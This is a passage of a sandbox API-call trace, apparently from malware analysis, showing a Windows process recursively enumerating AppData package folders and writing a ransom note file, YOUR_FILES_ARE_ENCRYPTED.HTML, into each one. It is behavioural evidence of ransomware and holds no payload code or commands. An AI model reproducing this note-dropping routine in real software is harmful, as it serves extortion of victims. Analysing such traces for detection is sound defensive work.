0x600000 [0116.619] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.619] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.net.native.framework.1.0_8wekyb3d8bbwe\\systemappdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0116.620] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.621] CloseHandle (hObject=0x320) returned 1 [0116.621] GetProcessHeap () returned 0x600000 [0116.621] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.621] GetProcessHeap () returned 0x600000 [0116.621] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.621] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7c8d0a7, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7c8d0a7, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf7c8d0a7, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0116.621] StrStrIW (lpFirst="TempState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.621] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\TempState") returned 107 [0116.621] GetProcessHeap () returned 0x600000 [0116.621] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.622] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\TempState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\TempState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\TempState" [0116.622] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\TempState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\TempState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\TempState\\*" [0116.622] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\TempState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7c8d0a7, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7c8d0a7, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf7c8d0a7, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184894, dwReserved1=0x31847d0, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0116.623] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7c8d0a7, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7c8d0a7, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf7c8d0a7, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184894, dwReserved1=0x31847d0, cFileName="..", cAlternateFileName="")) returned 1 [0116.623] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7c8d0a7, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7c8d0a7, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf7c8d0a7, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184894, dwReserved1=0x31847d0, cFileName="..", cAlternateFileName="")) returned 0 [0116.623] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0116.623] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 137 [0116.623] GetProcessHeap () returned 0x600000 [0116.623] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.623] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.net.native.framework.1.0_8wekyb3d8bbwe\\tempstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0116.624] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.624] CloseHandle (hObject=0x320) returned 1 [0116.624] GetProcessHeap () returned 0x600000 [0116.625] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.625] GetProcessHeap () returned 0x600000 [0116.625] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.625] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7c8d0a7, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7c8d0a7, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf7c8d0a7, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0116.625] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0116.625] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 127 [0116.625] GetProcessHeap () returned 0x600000 [0116.625] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.626] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.net.native.framework.1.0_8wekyb3d8bbwe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0116.626] WriteFile (in: hFile=0x31c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0116.627] CloseHandle (hObject=0x31c) returned 1 [0116.627] GetProcessHeap () returned 0x600000 [0116.627] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.627] GetProcessHeap () returned 0x600000 [0116.627] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0116.628] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5c5b9fe, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5ccdf89, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5ccdf89, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe", cAlternateFileName="MICROS~2.1_8")) returned 1 [0116.628] StrStrIW (lpFirst="Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.628] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe") returned 97 [0116.628] GetProcessHeap () returned 0x600000 [0116.628] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0116.629] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe" [0116.629] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\*" [0116.629] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5c5b9fe, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5ccdf89, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5ccdf89, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x626838 [0116.631] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5c5b9fe, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5ccdf89, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5ccdf89, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0116.631] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5ccdf89, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5ccdf89, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5ccdf89, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AC", cAlternateFileName="")) returned 1 [0116.631] StrStrIW (lpFirst="AC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.631] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\AC") returned 100 [0116.631] GetProcessHeap () returned 0x600000 [0116.631] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.632] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\AC" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\AC") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\AC" [0116.632] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\AC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\AC\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\AC\\*" [0116.632] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\AC\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5ccdf89, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5ccdf89, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5ccdf89, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184144, dwReserved1=0x3184080, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0116.636] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5ccdf89, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5ccdf89, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5ccdf89, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184144, dwReserved1=0x3184080, cFileName="..", cAlternateFileName="")) returned 1 [0116.636] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5ccdf89, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5ccdf89, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5ccdf89, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184144, dwReserved1=0x3184080, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0116.636] StrStrIW (lpFirst="INetCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.636] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\AC\\INetCache") returned 110 [0116.636] GetProcessHeap () returned 0x600000 [0116.636] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x670340 [0116.637] lstrcpyW (in: lpString1=0x670340, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\AC\\INetCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\AC\\INetCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\AC\\INetCache" [0116.638] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\AC\\INetCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\AC\\INetCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\AC\\INetCache\\*" [0116.638] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\AC\\INetCache\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5ccdf89, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5ccdf89, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5ccdf89, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x3184088, cFileName=".", cAlternateFileName="")) returned 0x626778 [0116.638] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5ccdf89, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5ccdf89, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5ccdf89, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x3184088, cFileName="..", cAlternateFileName="")) returned 1 [0116.638] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5ccdf89, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5ccdf89, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5ccdf89, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x3184088, cFileName="..", cAlternateFileName="")) returned 0 [0116.638] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0116.638] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 140 [0116.638] GetProcessHeap () returned 0x600000 [0116.638] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.639] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.net.native.framework.1.1_8wekyb3d8bbwe\\ac\\inetcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0116.643] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0116.644] CloseHandle (hObject=0x32c) returned 1 [0116.644] GetProcessHeap () returned 0x600000 [0116.645] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.645] GetProcessHeap () returned 0x600000 [0116.645] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0116.645] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5ccdf89, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5ccdf89, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5ccdf89, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184144, dwReserved1=0x3184080, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0116.645] StrStrIW (lpFirst="INetCookies", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.645] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\AC\\INetCookies") returned 112 [0116.645] GetProcessHeap () returned 0x600000 [0116.645] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x670340 [0116.645] lstrcpyW (in: lpString1=0x670340, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\AC\\INetCookies" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\AC\\INetCookies") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\AC\\INetCookies" [0116.645] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\AC\\INetCookies", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\AC\\INetCookies\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\AC\\INetCookies\\*" [0116.645] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\AC\\INetCookies\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5ccdf89, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5ccdf89, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5ccdf89, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x3184088, cFileName=".", cAlternateFileName="")) returned 0x626638 [0116.645] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5ccdf89, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5ccdf89, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5ccdf89, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x3184088, cFileName="..", cAlternateFileName="")) returned 1 [0116.645] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5ccdf89, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5ccdf89, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5ccdf89, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x3184088, cFileName="..", cAlternateFileName="")) returned 0 [0116.645] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0116.645] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 142 [0116.645] GetProcessHeap () returned 0x600000 [0116.645] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.645] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.net.native.framework.1.1_8wekyb3d8bbwe\\ac\\inetcookies\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 